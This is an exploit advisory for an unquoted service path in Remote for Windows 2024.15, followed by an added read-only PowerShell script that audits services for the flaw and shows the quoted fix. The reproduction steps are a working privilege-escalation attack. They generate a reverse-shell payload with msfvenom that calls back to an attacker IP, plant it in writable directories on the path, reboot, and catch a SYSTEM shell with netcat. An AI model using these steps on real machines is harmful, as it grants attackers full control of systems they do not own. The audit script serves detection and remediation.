# Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path
# Date: 2025-05-23
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)

Description:
The Remote4WindowsService installs with an unquoted service path and runs as LocalSystem.

C:\>sc qc Remote4WindowsService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Remote4WindowsService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Evgeny Cherpak\Remote for Windows\Remote4WindowsService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Remote4WindowsService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>

PS C:\> reg query "HKLM\SYSTEM\CurrentControlSet\Services\Remote4WindowsService" /v ImagePath

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Remote4WindowsService
    ImagePath    REG_EXPAND_SZ    C:\Program Files\Evgeny Cherpak\Remote for Windows\Remote4WindowsService.exe

PS C:\>

# Steps to Reproduce:

1. generate the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.101 LPORT=8081 -f exe > shell.exe

2. move the shell.exe to: (if writable)

"c:\" or
"C:\Program Files\" or
"C:\Program Files\Evgeny Cherpak\" or
"C:\Program Files\Evgeny Cherpak\Remote for Windows\"

restart windows:

shutdown /r /t 1

catch the shell as SYSTEM

$nc -lnvp 8081
listening on [any] 8081 ...
connect to [192.168.8.101] from (UNKNOWN) [192.168.8.105] 49672
Microsoft Windows [Version 10.0.19045.5011]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
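
# Detection (added example)

The following read-only PowerShell audit is an added example, not part of the original advisory or the vendor's software. It flags services whose ImagePath is unquoted and contains a space, lists the directories whose write ACLs need review, and shows the quoted value a fix would set. The helper name Test-UnquotedServicePath is hypothetical, and the script assumes the executable ends at the first ".exe".

```powershell
# Added example: read-only audit for unquoted service paths (run on Windows).
# Test-UnquotedServicePath is a hypothetical helper name, not a built-in cmdlet.
function Test-UnquotedServicePath {
    param([Parameter(Mandatory)][string]$ImagePath)

    $value = [Environment]::ExpandEnvironmentVariables($ImagePath).Trim()
    # Already quoted, or a driver-style path (\SystemRoot\..., \??\...): skip.
    if ($value.StartsWith('"') -or $value.StartsWith('\')) { return }

    # Assumption: the executable ends at the first ".exe"; the rest is arguments.
    $m = [regex]::Match($value, '^(.+?\.exe)(\s.*)?$', 'IgnoreCase')
    if (-not $m.Success) { return }
    $exe = $m.Groups[1].Value
    if ($exe -notmatch '\s') { return }   # no space in the path, nothing ambiguous

    # Collect every ancestor directory; review their write ACLs (e.g. with icacls).
    $dirs = @()
    $dir = [IO.Path]::GetDirectoryName($exe)
    while ($dir) { $dirs += $dir; $dir = [IO.Path]::GetDirectoryName($dir) }

    [pscustomobject]@{
        Executable  = $exe
        ReviewAcls  = $dirs
        QuotedValue = '"{0}"{1}' -f $exe, $m.Groups[2].Value
    }
}

# Sample input: the ImagePath shown in the reg query output above.
$sample = 'C:\Program Files\Evgeny Cherpak\Remote for Windows\Remote4WindowsService.exe'
Test-UnquotedServicePath -ImagePath $sample | Format-List

# Live audit of every service registered on this host.
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $name = $_.PSChildName
        $raw  = [string]$_.GetValue('ImagePath', '', 'DoNotExpandEnvironmentNames')
        if ($raw) {
            Test-UnquotedServicePath -ImagePath $raw |
                Select-Object @{ n = 'Service'; e = { $name } }, Executable, QuotedValue
        }
    }
```

Writing QuotedValue back to the service's ImagePath from an elevated prompt removes the ambiguity. Until that is done, keep the ReviewAcls directories writable by administrators only.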